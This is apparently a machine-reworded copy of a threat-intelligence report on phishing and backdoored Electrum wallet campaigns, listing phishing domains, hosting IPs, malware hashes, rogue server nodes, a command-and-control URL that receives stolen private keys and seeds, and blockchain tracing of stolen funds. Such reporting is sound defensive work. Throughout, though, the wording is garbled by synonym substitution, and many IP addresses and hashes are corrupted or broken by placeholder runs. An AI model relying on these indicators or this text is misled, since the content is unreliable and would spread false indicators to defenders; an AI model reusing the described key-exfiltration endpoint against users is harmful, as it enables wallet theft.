Peter Kacherginsky

By Jeremiah O’Connor and also Peter Kacherginsky

In Electrohunt Component 1, we described the current phishing and also malware projects targeting the Bitcoin Simple Settlement Confirmation purse Electrum. In this part we will certainly go over the ongoing assault by these economically inspired crooks on the Electrum network and also its customers. We will certainly evaluate a few of the various stars and also fads we are viewing as of late in the criminal cryptosphere. Furthermore we will certainly discuss the discovery approach we are developing, and also will certainly map a few of the deals on the Electrum network utilizing blockchain evaluation to check out where these swiped funds are being washed.

We have actually observed strikes on the Electrum network stemming from the Ukrainian/Russian area, where crooks are infamous for targeting the economic market (cryptocurrency, financial institutions, charge card fraudulence) in order to additional fund their illegal tasks. There have actually been a range of distribution vectors in the past, nevertheless lately opponents have started a brand-new approach so as to get customers to link to harmful web servers by introducing a DDoS on the network in order to lower reputable web servers and also link to harmful ones. Presently there are several stars abusing the Electrum network, the most significant one stemming from the Ukraine area. We can analyze with high self-confidence this economically inspired star is progressed and also has a great quantity of expertise regarding cryptocurrencies and also exactly how the Electrum network operates in order to control it to their benefit. To the existing day we approximate this star has actually swiped over ~ 7 million bucks well worth of BTC because December 2018 (existing price quote sometimes of creating).

Presently we are tracking several economically inspired stars that are abusing various crypto brand names by means of DNS with the assistance of DomainTools. Amongst among one of the most prevalent fads we have actually been observing since late is the surge of phishing integrated with malware targeting cryptocurrency SPV purse software application, with Electrum being among the key targets. We’re observing a specifically huge star (in addition to a few other smaller sized however effective stars) originating from Ukraine/Russian areas targeting the Electrum network, producing domain names wholesale, and also a change network in order to escape discovery. Right here we can see collections of Electrum phishing websites originating from several Ukrainian netblocks with extremely little misuse avoidance. These rogue facilities occasionally run by crooks themselves, help in the criminal undertakings by these distributes. These bulletproof hosts typically have reduced positions amongst ASNs, with a reduced IP to high domain name misuse proportion. Right here we can see among the most significant collections of phishing websites held on ASN 206638, HOSTFORY, UA:

electrumapp.org,9121189[.]115, AS206638 HOSTFORY, UA
electrumapp.org,9121189[.]115, AS206638 HOSTFORY, UA
goelectrum.com,9121189[.]113, AS206638 HOSTFORY, UA
myelectrum.org,9121189[.]112, AS206638 HOSTFORY, UA
downloadelectrum.org,9121189[.]111, AS206638 HOSTFORY, UA
electrumbtc.org,9121189[.]110, UA, AS206638 HOSTFORY, UA
btcelectrum.org,9121189[.]109, AS206638 HOSTFORY, UA
downloadelectrum.com,9121189[.]108, AS206638 HOSTFORY, UA
electrumdownload.com,9121189[.]107, AS206638 HOSTFORY, UA
electrumupgrade.org,9121189[.]106, AS206638 HOSTFORY, UA
electrumbase.org,9121189[.]103, AS206638 HOSTFORY, UA
electrumsafe.org,9121189[.]103, AS206638 HOSTFORY, UA
electrumware.org,9121189[.]103, AS206638 HOSTFORY, UA
electrumcore.com,9121189[.]103, AS206638 HOSTFORY, UA
electrumopen.org,9121189[.]103, UA, AS206638 HOSTFORY, UA
electrumdownload.org,9121189[.]102, AS206638 HOSTFORY, UA
electrumupdate.com,9121189[.]101, AS206638 HOSTFORY, UA
electrumcircle.com,9121189[.]100, AS206638 HOSTFORY, UA
electrumapp.com,9121189[.]100, AS206638 HOSTFORY, UA
electrumapps.net,9121189[.]100, AS206638 HOSTFORY, UA
electrumbit.org,9121189[.]100, AS206638 HOSTFORY, UA
electrumgit.com,9121189[.]100, AS206638 HOSTFORY, UA
electrumgroup.net,9121189[.]100, AS206638 HOSTFORY, UA
electrumsoft.net,9121189[.]100, AS206638 HOSTFORY, UA
electrumversion.com,9121189[.]100, AS206638 HOSTFORY, UA
electrumreleases.org,9121189[.]100, AS206638 HOSTFORY, UA
getelectrum.com,9121189[.]100, AS206638 HOSTFORY, UA
electrum.sx,9121189[.]100, AS206638 HOSTFORY, UA
electrum.bz,9121189[.]100, AS206638 HOSTFORY, UA

These IPs are coming Ukraine IP Area:

Nation: Ukraine
Area: Dnipropetrovska Oblast
City: Dnipro
ISP: Pe Brezhnev Daniil

This holding service provider uses committed web servers for acquisition with DDoS defense and also extremely little enforcement of the material held on them, a great sanctuary for crooks to run openly, additionally offering presence right into the quantity of earnings created by this certain team and also what these crooks agree to invest in committed holding:

This star is spreading their project throughout various other suppliers originating from 185.200190[.]204, AS42533 DCUA-AS, UA, Ukrainian service provider:

electrumfix[.] com,185200190[.]204, UA,2019–02–12 T20: 05: 56, AS42533 DCUA-AS, UA
electrumbase[.] internet,185200190[.]204, UA,2019–02–12 T20: 06: 06, AS42533 DCUA-AS, UA
electrumsite[.] com,185200190[.]204, UA,2019–02–12 T20: 03: 03, AS42533 DCUA-AS, UA
electrumbuild[.] com,185200190[.]204, UA,2019–02–12 T04: 27: 08.00, AS42533 DCUA-AS, UA
electrumcore[.] internet,185200190[.]204, UA,2019–02–09 17: 01: 22, AS42533 DCUA-AS, UA
electrumapps[.] com,185200190[.]204, UA,2019–02–07 17: 39: 44, AS42533 DCUA-AS, UA
electrumbase[.] com,185200190[.]204, UA,2019–02–07 17: 39: 54, AS42533 DCUA-AS, UA
electrumweb[.] internet,185200190[.]204, UA,2017–11–30 T02: 49: 16 Z, AS42533 DCUA-AS, UA
electrumsource[.] org,185200190[.]204, UA,2017–11–30 T02: 49: 16 Z, AS42533 DCUA-AS, UA

IP Place

Nation: Ukraine
Area: Kyiv
City: Kiev
ISP: Ntx Technologies Ltd

ASN

AS51765 CREANOVA-AS Oy Creanova Hosting Solutions Ltd., FI (signed up)

Right here is a collection of Electrum phishing websites originating from a Russian AS29182, THEFIRST-AS, RU, additionally utilizing IDNs to make their satires extra reputable looking:

eilectrum.org, 82.14637[.] 8, AS29182, THEFIRST-AS, RU
eliectrum.org, 82.14637[.] 8, AS29182, THEFIRST-AS, RU
ellectrium.org, 82.14637[.] 8, AS29182, THEFIRST-AS, RU
elliectrum.org, 82.14637[.] 8, AS29182, THEFIRST-AS, RU
get-electrum. internet, 82.14637[.] 8, AS29182, THEFIRST-AS, RU
get-electrum. professional, 82.14637[.] 8, AS29182, THEFIRST-AS, RU
xn-- eectrum-9hb. org, 82.14637[.] 8, AS29182, THEFIRST-AS, RU
xn-- eletrum-45 a.com, 82.14637[.] 8, AS29182, THEFIRST-AS, RU

Utilizing outstanding DNS presence devices such as DomainTools we have the ability to keep track of and also evaluate assaulter facilities. Right here we can see opponents duplicate the material straight from Electrum’s web page resource, utilizing a Let’s Encrypt SSL certification to make their spoofed websites show up even more reputable:

Among the crucial components of any kind of effective phishing project is the distribution vector of exactly how the deceitful material is offered to the target. Bad guys stars targeting cryptocurrencies have actually made use of a range of various distribution systems consisting of e-mail, mass malvertising, spoofing inside mistake messages and also most lately DDoSing reputable web servers on the Electrum network in an initiative to compel ignorant customers to the harmful web servers. The distribution systems in this project were rather unique, the customer operating reputable Electrum software application attaches to an Electrum web server run by the assaulter, when they attempt and also transmit their deal a web server responds with a mistake message rerouting the unknowing customer to the phishing website marketing to the customer to download and install the harmful variation. To raise the likelihood of success for this assault, opponents are not just producing brand-new domain names on various facilities (within comparable area) in prevalent fashion and also fluxing with them, the opponents are additionally generating several brand-new web servers (sybils) in order to raise opportunities of legitimate customers attaching to rogue web server.

Electrum has actually been a target of nation-state stars in addition to the mob teams in the past. We have actually seen Electrum extensively abused in the past with various distribution systems by an opponents in very same Ukraine/Russia area. Electrum was a large target in mass malvertising projects in Google Advertisements:

Google Advertisements targeting cryptocurrency purses and also exchanges has actually gone under hefty removal because late 2017 very early 2018, which we have actually assisted with and also the general health of crypto money relevant advertisements is much cleaner. Lately opponents have actually counted on DDoSing the Electrum connect with an enormous botnet of over +80 K IPs (numbers sometimes of creating). They are aiming it at the reputable web servers in an initiative to overload them and also compel customer link to the harmful nodes in order to market the upgrade to the current variation, rerouting customers to the phishing websites, where they download and install the offline purse malware.

We remain in the onset of developing out our analytical assault discovery capacities and also try out a collection of various formulas for uncovering these deceitful websites within network website traffic. For our training collection we developed a data base of various cryptocurrency wallets/exchanges websites and also information related to them. Removing signals from classified network website traffic and also utilizing Doc2Vec to construct a version on attributes from the reputable crypto brand name websites’ DOM, we are presently leveraging a mix of not being watched and also monitored methods to try to find dubious actions in network website traffic. Examining the version survive on a few of these star’s networks we are checking we’re obtaining some outstanding initial outcomes and also locating much of these domain names to life offering weaponized material at the very same time, showing they’re revolving in between the various domain names they have actually signed up. Right here are some outcomes when penetrating the network on February 18:

——————————–(****************** )Domain name: electrumbase.org(****************** )Timestamp:2019–02–1821:07:51625177
Forecast → Phish, Course → Electrum
——————————–
Domain name: electrumsafe.org
Timestamp:2019–02–1821:07:57839763
Forecast → Phish, Course → Electrum
——————————–
Domain name: electrumware.org
Timestamp:2019–02–1821:08:05534325
Index, Cos Sim( 0– 1), Record( Brand/Domain)
Forecast → Phish, Course → Electrum
——————————–
Domain name: electrumcore.com
Timestamp:2019–02–1821:08:12128769
Forecast → Phish, Course → Electrum
——————————–
Domain name: electrumopen.org
Timestamp:2019–02–1821:08:18911233
Forecast → Phish, Course → Electrum
——————————–
HTTPConnectionPool( host=’ electrumget.com’, port =(*************************************************************************************************************************************************************************************************************************************************************************************************************************************************** )): Max retries surpassed with link:/( Brought On By ConnectTimeoutError(,‘Connection to electrumget.com timed out. (connect timeout=10)’))
——————————–
Domain name: electrumdownload.com
Timestamp:2019–02–1821:08:35910781
Forecast → Phish, Course → Electrum
——————————–
Domain name: electrumdownload.org
Timestamp:2019–02–1821:08:42666782
Forecast → Phish, Course → Electrum
——————————–
Domain name: goelectrum.com
Timestamp:2019–02–1821:08:48912725
Forecast → Phish, Course → Electrum
——————————–
Domain name: etelectrum.com
Timestamp:2019–02–1821:08:56183600
Forecast → Phish, Course → Electrum
——————————– HTTPConnectionPool( host=’ electrumupgrade.org’, port =80): Max retries surpassed with link:/( Brought On By NewConnectionError(‘: Fell short to develop a brand-new link:[Errno 8] nodename neither servname supplied, or otherwise recognized’,))
——————————–
Domain name: electrumupdate.com
Timestamp:2019–(************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************ )–1821:09:02765260
Forecast → Phish, Course → Electrum
——————————– HTTPConnectionPool( host=’ electrumpgrade.com’, port =80): Max retries surpassed with link:/( Brought On By NewConnectionError(‘: Fell short to develop a brand-new link:[Errno 61] Link rejected’,))
——————————–
Domain name: electrumdownload.com
Timestamp:2019– 02–1821:09:09291047
Forecast → Phish, Course → Electrum
——————————– HTTPConnectionPool( host=’ electrumbtc.org’, port =80): Max retries surpassed with link:/( Brought On By NewConnectionError(‘: Fell short to develop a brand-new link:[Errno 51] Network is inaccessible’,))
——————————–
Domain name: downloadelectrum.org
Timestamp:2019–02–(******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************** )21:09:22838411
Forecast → Phish, Course → Electrum
——————————–
Domain name: downloadelectrum.com
Timestamp:2019–02–1821:09:29267028
Forecast → Phish, Course → Electrum
——————————–
Domain name: btcelectrum.org
Timestamp:2019–02–1821:09:35728569
Forecast → Phish, Course → Electrum
——————————–
Domain name: electrumware.org
Timestamp:(************************************************************************************************************************************************************************************************************************************** )–02–1821:09:42282752
Forecast → Phish, Course → Electrum
——————————–

Fluxing networks of phishing websites is an usual adversarial method made use of by opponents to escape discovery and also monitoring, as quickly as one harmful domain name is located and also reported, a brand-new domain name is rotated up and also prepared to rob, occasionally on various( yes still bulletproof) facilities in order to make relationship harder.

Utilizing blockchain evaluation devices we had the ability to map the cash circulation of this assaulter team, below we can see a bulk of the deals(373 txns sometimes of creating) mosted likely to BitSquare:

At Bitsquare the swiped funds( BTC) were after that transformed to an extra personal privacy tailored modern technology Monero( XMR):

When taking part in criminal tasks, it is useful to not have your deals saved on a public journal for police and also cyber safety and security specialists to evaluate. Personal privacy coins such as Monero, while alone is simply a personal privacy modern technology and also non-malicious, can occasionally work as an additional layer of anonymization for crooks to additional mask the motion of swiped funds, a fad that is currently extremely usual amongst stars experienced regarding cryptocurrencies. Examining the deal chart a little bit much deeper we had the ability to figure out some heuristics that were particular of this star team, and also had the ability to discover over150+ addresses connected to these strikes. Amongst the usual patterns related to this team:(************* ).

  1. Communication with addresses located in the malware executables and also with open resource knowledge event
  2. Use single, non reusable sub purses for additional obfuscation of swiped BTC(********************************************** ).
  3. Sending out to various other bech32( segwit assistance) addresses with a split of ~ 2.0 BTC, what we presume to be some kind of repayment to an additional entity (see screenshot listed below with deals on 4/16)

4. Resemblance amongst entities where the funds were sent out such as BitSquare, Bitfinex, and also various other exchanges with restricted KYC enforcement, abused by crooks en masse for absence of far better term“bulletproof exchanges”

Tracking the swiped funds that underwent Bitfinex, we observed they were sent out to MorphToken, a token market committed to exchanging properties comparable to ShapeShiftIO. Furthermore we can see communication in between LocalBitcoins, also known as“the Craigslist of bitcoins” a peer-to-peer exchange, that uses an easier/safer method for economic stars to cashout. We can additionally see communications with Russian Darknet Markets consisting of Hydra and also Wall surface Road Market:

We are observing a boosting fad in this sort of coin taking malware targeting a range of various brand names and also we anticipate it will certainly remain to come to be extra common. Individuals that know the villainous task on the Electrum network are wanting to the following Bitcoin purse which additionally are being targeted by crypto inspired opponents. Enemies are starting to phish various other brand names of Bitcoin purse consisting of Exodus and also Bitcoin Depot. These are originating from comparable Ukraine/Russian area, and also we have actually observed a selection of phishing strikes on cryptocurrency originating from this netblock AS48282 MCHOST-AS, RU, this certain IP is185(************************************************************************************************************************************************************************************************************************************************************************************** ). 39.110:

Right here we can see the domain name bitcoinarmory[.] technology on the very same IP targeting an additional offline purse Bitcoin Depot:

Various other assault fads to keep in mind in this area are the strikes on Trezor purses as described in the current Phishfort short article, these strikes were held on,9122010125,9122010137,9122010153, on AS34259, HIGHLOAD Solutions. We are observing an ongoing fad of economically inspired opponents in Ukraine, Russian area targeting all various sorts of cryptocurrencies not restricted to software application, however additionally consisting of equipment purses.

While working with mapping this Electrum project our discovery techniques assembled on several various degrees. We had the ability to track these projects at the DNS degree, malware executable degree, open-source knowledge, as well as additionally utilizing blockchain evaluation and also cataloging heuristics certain to this star team we have the ability to map brand-new purses as they are produced. Knowledge obtained from assessing this certain star team’s task additionally aided us tune our very own discovery designs and also software application devices to raise traceability and also additionally far better protect the crypto economic climate. Make certain to remain conscious when downloading and install newest variations of cryptocurrency purse software application. Several of the safety and security determines customers can require to stay clear of obtaining phished/infected with purse malware:

  • Check LINK of where you are downloading/entering qualifications
  • Publication mark the LINK of wallets/exchanges you are negotiating with
  • If downloading and install from outdoors resource, ensure to it is relied on, and also reputable executables hashes suit

Unique many thanks for payments to this short article and also knowledge to DomainTools, Elliptic, Phishfort, MyCrypto, and also various other safety and security specialists at purse companies/exchanges in crypto neighborhood that we will certainly maintain confidential, you recognize that you are

.

Project # 1(*************************************************************** ).

This project relies upon marketing harmful mistake messages to older Electrum customers and also advising them to download and install backdoored variations of the customer. Based upon the malware evaluation, this coincides star as Project # 1 described in the previous component of the repot.

Domain names for this project:(************* ).

https://electrum[.] bz
https://electrumproject [.] org
https://electrumsecure[.] org
https://electrum[.] la

.

The malware utilizes the backdoored variation of the Electrum-3.3.3 purse. Below are the hashes

8324 ecf39 c1f297 d781 e
735 ece4abb 81 Electrum-4.0.0.0- release.apk
3ff2d49 aee1198454 f33 efea26 f08 c0a electrum-4.0.0. dmg
e0cef18 af25 e66 fc7c5734 ea89 be62 ef electrum-4.0.0. exe
788055 c6b769 a1e515 a60 f9e851 f5b46 electrum-4.0.0- portable.exe
6a48 a4b0aecf5eaf9a4d8139 a152 be59 electrum-4.0.0- setup.exe
4e77091 af3c083 f97 b54355 e0d36 f92 e Electrum-4.0.0. tar.gz

Reroutes deals to the complying with address:

bc1qcla39 fm0q8ka8th8ttpq0yxla30 r430 m4hgu3x

Adjustments made:

  • Handicapped different application cautions
  • Handicapped upgrade system
  • Caches application password

The malware have actually additionally customized the default node listing eliminating most of nodes just leaving the complying with undamaged:

bitcoin3nqy3db7c[.] onion
electrumxhqdsmlu[.] onion

It has actually additionally included the complying with brand-new nodes:

luggscoqbymhvnkp[.] onion
ndndword5lpb7eex[.] onion
ozahtqwp25 chjdjd[.] onion
qtornadoklbgdyww[.] onion
s7clinmo4cazmhul[.] onion
wsw6tua3xl24 gsmi264 zaep6seppjyrkyucpsmuxnjzyt3f3j6swshad[.] onion
oneweek.duckdns[.] org
electrum.electrumxm[.] com
electrum.elastics[.] information
electrum.esrv[.] one
electrum.ssrv[.] information
electrum.fullhealth [.] internet(****************** )electrum.tnsfr [.] web link
electrum.livex[.] biz
electrum.rollerco[.] xyz
electrum.arcade[.] tel
electrum.bip.click
electrum.xs500[.] internet
electrum.lightspeed[.] tel
electrum.txid[.] pw

Project # 2

The backdoored variation of Electrum purse tries to publish base64 inscribed personal secret to the complying with web server:

http://3812866[.] 3:4285/ post/data =[KEY_BASE64]

Project domain names:

.

https://www.electrumsecuredownload[.] com

Malware examples:

313562 c72732 ac7a9ad43571 ac7e5856 electrum-3.4.0. exe
e35 a2e2c5180 c6b63 e534 cb1c4671552 electrum-3.4.0- portable.exe
068 d4ebe8901 f00 b7df9e885198 bbc32 electrum-3.4.0- setup.exe
d9a7365787 febee99 a1d95 ee9aeaad8b electrum-3.4.0- x86 _64 AppImage

Project # 3

Circulates by sending out phony mistake messages with harmful web servers. Targets a BCH fork of Electrum called Electron-Cash. Special in its use sharefile.com.

Standalone Executable:https://Electrum.sharefile.com/d-s133ec465886459b8

Windows Installer:https://Electrum.sharefile.com/d-sd63f248b96c410d9
Mobile variation:https://Electrum.sharefile.com/d-s8e5840fd61d46dfa
MacOShttps://Electrum.sharefile.com/d-s356f875975c47079

Hashes for the above:

5768 cf5db5ca9fd8c97 a42779 b1c 3601 Electron-Cash-3.3.6. dmg
charge2190475 e8d1742 a65 c5c8a49 cc517 Electron-Cash-3.3.6. exe
3b149 a9d7ad6f4032 f386 d2f08968 f08 Electron-Cash-3.3.6- portable.exe
0f2b668 e71 a086 abdominal muscle662 ddc25 a7486135 Electron-Cash-3.3.6- setup.exe

Project # 4

A distinct star that utilizes harmful nodes to activate phishing mistake messages in older Electrum customers. The star seems fairly brand-new and also has numerous one-of-a-kind methods listed below.

Phishing website:

http://electrumwalletbtc.hopto[.] org

Malware examples:

21655 fdacbfac2b187 f0a5f98 f39888 e electrum-3.3.4- portable.exe(****************** )80 f570 f3026 f4a09 d5eff3c29858 fa63 electrum-3.3.4- setup.exe
77 f846 b48 ad7a625 f585 c1f126 dc2252 electrum-3.3.4- x86 _64 tar.xz

The malware is one-of-a-kind in its use the current resource from the main Github.441 da52 b HEAD specifically. It executes the complying with alterations to the documents:

  • Disables upgrade UI choices
  • Records customer’s seed worth and also forwards it to the C2 LINK utilizing HTTP BLOG POST criteria {‘s’: seed,’ se’: seedext}

C2 Domain Name:

http://electrumwalletbtc.hopto[.] org/time. php

DNS Frameworks

eiectrum[.] internet,185222 202[.]108, AS204725 UVL2-ASN, UA
myelecrum[.] information,185222202[.]108, AS204725 UVL2-ASN, UA
electrume[.] com,185222202[.]108, AS204725 UVL2-ASN, UA
electrume[.] org,185222202[.]108, AS204725 UVL2-ASN, UA
electrume[.] information,185222202[.]108, AS204725 UVL2-ASN, UA
btc-electrum[.] com,185222202[.]108, AS204725 UVL2-ASN, UA
electrumapp[.] org,9121189[.]115, AS206638 HOSTFORY, UA
electrumbitcoin[.] org,9121189[.]105, AS206638 HOSTFORY, UA
myelectrum[.] org,9121189[.]112, AS206638 HOSTFORY, UA
electrumsecure[.] org,93171158[.]14, AS201094 GMHOST, UA
electrum[.] vc,93171158[.]14, AS201094 GMHOST, UA
electrumapp[.] com,9121189[.]100, AS206638 HOSTFORY, UA
electrumapps[.] internet,9121189[.]100, AS206638 HOSTFORY, UA
electrumbit[.] org,93171158[.]14, AS206638 HOSTFORY, UA
electrumgit[.] com,93171158[.]14, AS206638 HOSTFORY, UA
electrumgroup[.] internet,9121189[.]100, AS206638 HOSTFORY, UA
electrumsoft[.] internet,93171158[.]14, AS206638 HOSTFORY, UA
electrumversion[.] com,9121189[.]100, AS206638 HOSTFORY, UA
electrumreleases[.] org,9121189[.]100, AS206638 HOSTFORY, UA
electrum[.] sx,9121189[.]100, AS206638 HOSTFORY, UA
eilectrum[.] org,8214637[.] 8, AS29182 THEFIRST-AS, RU
eliectrum[.] org,8214637[.] 8, AS29182 THEFIRST-AS, RU
ellectrium[.] org,8214637[.] 8, AS29182 THEFIRST-AS, RU
elliectrum[.] org,8214637[.] 8, AS29182 THEFIRST-AS, RU
get-electrum[.] internet,8214637[.] 8, AS29182 THEFIRST-AS, RU
get-electrum[.] pro,8214637[.] 8, AS29182, THEFIRST-AS, RU
xn-- eectrum-9hb[.] org,8214637[.] 8, AS29182 THEFIRST-AS, RU
xn-- eletrum-45 a[.] com,8214637[.] 8, AS29182 THEFIRST-AS, RUelectrumapp[.] live,38111114[.] 7, AS62563 AS-GLOBALTELEHOST– GLOBALTELEHOST Corp., CA
electrumbch[.] com,38111114[.] 7, AS62563 AS-GLOBALTELEHOST– GLOBALTELEHOST Corp., CA
electrumdownloadserver[.] com,38111114[.] 7, AS62563 AS-GLOBALTELEHOST– GLOBALTELEHOST Corp., CA
electrumlite[.] com,38111114[.] 7, AS62563 AS-GLOBALTELEHOST– GLOBALTELEHOST Corp., CA
electrumlitecoin[.] com,38111114[.] 7, AS62563 AS-GLOBALTELEHOST– GLOBALTELEHOST Corp., CA
electrumn[.] com,38111114[.] 7, AS62563 AS-GLOBALTELEHOST– GLOBALTELEHOST Corp., CA
electrumsecuredownload[.] com,38111114[.] 7, AS62563 AS-GLOBALTELEHOST– GLOBALTELEHOST Corp., CA
electrumx[.] org,38111114[.] 7, AS62563 AS-GLOBALTELEHOST– GLOBALTELEHOST Corp., CA
electrunm[.] org,38(************************************************************************************************************************************************************************************************************************************************************************************************************************* ).114[.] 7, AS62563 AS-GLOBALTELEHOST– GLOBALTELEHOST Corp., CA
getelectrum[.] live,38111 114[.] 7, AS62563 AS-GLOBALTELEHOST– GLOBALTELEHOST Corp., CA
electrum[.] sx,170130175[.]154, AS49532 SERVERHUB-NL, DE
electrumhub[.] com,170130175[.]154, AS49532 SERVERHUB-NL, DE
electrumnet[.] com,170130175[.]154, AS49532 SERVERHUB-NL, DE
electrumreleases[.] com,170130175[.]154, AS49532 SERVERHUB-NL, DE
electrumsafe[.] org,170130 175[.]154, AS49532 SERVERHUB-NL, DE
electrumstart[.] org,170130175[.]154, AS49532 SERVERHUB-NL, DE
electrumware[.] com,170(***************************************************************************************************************************************************************************************************************************************************************************************************************** ).175[.]154, AS49532 SERVERHUB-NL, DE
electrum[.] bz,9121189[.]100, AS206638 HOSTFORY, UA
electrumcircle[.] com,9121189[.]100, AS206638 HOSTFORY, UA
electrumproject[.] org,93171158[.]14, UA,2019–03–14 T01:07:36 Z, AS201094 GMHOST, UA
electrumweb[.] internet,185200190[.]204, UA,2017–11–30 T02:49:16 Z, AS42533 DCUA-AS, UA
electrumsource[.] org,185200190[.]204, UA,2017–11–30 T02:49:16 Z, AS42533 DCUA-AS, UA
electrumfix[.] com,185200190[.]204, UA,2019–02–12 T20:05:56, AS42533 DCUA-AS, UA
electrumbase[.] internet,185200190[.]204, UA,2019–02–12 T20:06:06, AS42533 DCUA-AS, UA
electrumsite[.] com,185200190[.]204, UA,2019–02–12 T20:03:03, AS42533 DCUA-AS, UA
electrumbuild[.] com,185200190[.]204, UA,2019–02–12 T04:27:0800, AS42533 DCUA-AS, UA
electrumcore[.] internet,185200 190[.]204, UA,2019–02–0917:01:22, AS42533 DCUA-AS, UA
electrumapps[.] com,185200190[.]204, UA,2019–02–0717:39:44, AS42533 DCUA-AS, UA
electrumbase[.] com,185200190[.]204, UA,2019–02–0717:39:54, AS42533 DCUA-AS, UA
www.electrumclient[.] org,185200190[.]204, UA,2019–02–10 T16:34:42, AS42533 DCUA-AS, UA
electrumofficial[.] com,19097167[.]181, ,2019–02–0723:53:20, AS27956 Cyber Cast International, S.A.,
carderstuff[.] pro,19097167[.]181, ,2018–11–0113:00:55, AS27956 Cyber Cast International, S.A.,
privatstuff[.] website,19097167[.]181, ,, AS27956 Cyber Cast International, S.A.,
privatstuff[.] shop,19097167[.]181, ,, AS27956 Cyber Cast International, S.A.,
electrumbase[.] org,9121189[.]103, UA,2019–02–0620:20:41, AS206638 HOSTFORY, UA
electrumsafe[.] org,9121189[.]103, UA,2019–02–0418:35:10, AS206638 HOSTFORY, UA
electrumware[.] org,9121189[.]103, UA,2019–02–0620:20:02, AS206638 HOSTFORY, UA
electrumcore[.] com,9121189[.]103, UA,2019–02–07 T02:57:10, AS206638 HOSTFORY, UA
electrumopen[.] org,9121189[.]103, UA,2019–02–06 T20:20:22, AS206638 HOSTFORY, UA
electrumget[.] com,170130175[.]154, DE,2019–02–0721:37:16, AS49532 SERVERHUB-NL, DE
electrumdownload[.] com,9121189[.]107, UA,2019–01–29 T07:00:00, AS206638 HOSTFORY, UA
electrumdownload[.] org,9121189[.]102, UA,2019– 02–04 T18:30:03, AS206638 HOSTFORY, UA
goelectrum[.] com,9121189[.]113, UA,2019– (************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************* )–29 T07:00:00, AS206638 HOSTFORY, UA
getelectrum[.] com,9121189[.]100, UA,2019–(************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************* )–29 T07:00:00, AS206638 HOSTFORY, UA
electrumupgrade[.] org,9121189[.]106, UA,2019– 01–29 T19:57:55, AS 206638 HOSTFORY, UA
electrumupdate[.] com,9121189[.]101, UA,2019–01–29 T07:00:00, AS206638 HOSTFORY, UA
electrumpgrade[.] com,10716123[.]204, United States,2019–01–29 T07:00:00, AS3842 RAMNODE– RamNode LLC, United States
electrumdownload[.] com,9121189[.]107, UA,2019–02–10 T07:00:00, AS206638 HOSTFORY, UA
electrumbtc[.] org,9121189[.]110, UA,2019–01–29 T19:57:55, AS206638 HOSTFORY, UA
downloadelectrum[.] org,9121189[.]111, UA,2019–01–29 T19:57:55, AS206638 HOSTFORY, UA
downloadelectrum[.] com,9121189[.](**************************************************************************************************************************************************************************************************************************************************************************************************************************** ), UA,2019–01–29 T07:00:00, AS206638 HOSTFORY, UA
btcelectrum[.] org,9121189[.]109, UA,2019–01–29 T19:57:59, AS206638 HOSTFORY, UA
electrumware[.] org,9121189[.]103, UA,2019–02–06 T20:20:02, AS 206638 HOSTFORY, UA

Communication with Darknet Market websites

Hydra– hydraruzxpnew4af[.] onion
Wall Surface Road Market– wallstyizjhkrvmj[.] onion

Examples of the XMR deal on BitSquare

90321 b6890622 ea49011 c 22752011 d019 d451 f61 e60 fe5b0b73 fbf657790 f62 f
19 d39108 e709144980564 d5c3e9ea193 ef3e0f18 b9fae19 d2afe564 bc8490 ec4
38 da16437 b1507 db8f48 c68131031 d1bcda7497 d841 f3267192 b0dcbf8836 e57
1af76520 fe244174 ebe1402 e7e7a30182 a207 e8d02 a91 b8ed8922 advertisement37299065 d
d097233 c97361 dc09 d91 d676 fcac75356 dfef3ee407 c525 ea697 b7f170 f61434

Several of huge addresses

Bc1qcla39 fm0q8ka8th8ttpq0yxla30 r430 m4hgu3x